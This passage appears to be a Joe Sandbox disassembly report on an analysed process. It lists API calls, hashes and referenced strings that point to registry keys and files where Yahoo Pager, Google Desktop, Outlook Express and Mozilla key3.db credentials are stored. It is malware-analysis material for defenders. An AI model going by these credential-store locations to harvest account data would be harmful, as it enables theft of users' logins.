                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                APIs
                                • memset.MSVCRT ref: 0044495F
                                • memset.MSVCRT ref: 00444978
                                • memset.MSVCRT ref: 0044498C
                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                • strlen.MSVCRT ref: 004449A8
                                • memcpy.MSVCRT ref: 004449CD
                                • memcpy.MSVCRT ref: 004449E3
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                • memcpy.MSVCRT ref: 00444A23
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset$strlen
                                • String ID:
                                • API String ID: 2142929671-0
                                • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                APIs
                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                • memset.MSVCRT ref: 0040330B
                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                • strchr.MSVCRT ref: 0040335A
                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                • strlen.MSVCRT ref: 0040339C
                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                • String ID: Personalities
                                • API String ID: 2103853322-4287407858
                                • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                APIs
                                • memset.MSVCRT ref: 00444573
                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValuememset
                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                • API String ID: 1830152886-1703613266
                                • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                APIs
                                Strings
                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                • API String ID: 3510742995-272990098
                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: H
                                • API String ID: 2221118986-2852464175
                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                • API String ID: 3510742995-3170954634
                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID: @ $SQLite format 3
                                • API String ID: 231171946-3708268960
                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: winWrite1$winWrite2
                                • API String ID: 438689982-3457389245
                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: winRead
                                • API String ID: 1297977491-2759563040
                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: gj
                                • API String ID: 1297977491-4203073231
                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                APIs
                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                • memset.MSVCRT ref: 0040AB9C
                                  • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                • sprintf.MSVCRT ref: 0040ABE1
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                • String ID: <%s>%s</%s>$</item>$<item>
                                • API String ID: 3337535707-2769808009
                                • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                APIs
                                • GetParent.USER32(?), ref: 004090C2
                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                • String ID:
                                • API String ID: 4247780290-0
                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                APIs
                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                • String ID:
                                • API String ID: 2374668499-0
                                • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                • Opcode Fuzzy Hash: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                APIs
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                                  • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                • Opcode Fuzzy Hash: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                APIs
                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                • GetSysColor.USER32(00000005), ref: 004107A6
                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                • String ID:
                                • API String ID: 2775283111-0
                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                • API String ID: 885266447-2471937615
                                • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                APIs
                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                • String ID: Ul@$key3.db
                                • API String ID: 1968906679-1563549157
                                • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi$_mbscpy
                                • String ID: smtp
                                • API String ID: 2625860049-60245459
                                • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                APIs
                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                • memset.MSVCRT ref: 00408258
                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                Strings
                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Close$EnumOpenmemset
                                • String ID: Software\Google\Google Desktop\Mailboxes
                                • API String ID: 2255314230-2212045309
                                • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                APIs
                                • memset.MSVCRT ref: 0040C28C
                                • SetFocus.USER32(?,?), ref: 0040C314
                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FocusMessagePostmemset
                                • String ID: S_@$l
                                • API String ID: 3436799508-4018740455
                                • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                APIs
                                • memset.MSVCRT ref: 004092C0
                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                • _mbscpy.MSVCRT ref: 004092FC
                                Strings
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileString_mbscpymemset
                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                • API String ID: 408644273-3424043681
                                • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy
                                • String ID: C^@$X$ini
                                • API String ID: 714388716-917056472
                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                APIs
                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                • String ID: MS Sans Serif
                                • API String ID: 3492281209-168460110
                                • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClassName_strcmpimemset
                                • String ID: edit
                                • API String ID: 275601554-2167791130
                                • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$_mbscat
                                • String ID: 3CD
                                • API String ID: 3951308622-1938365332
                                • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
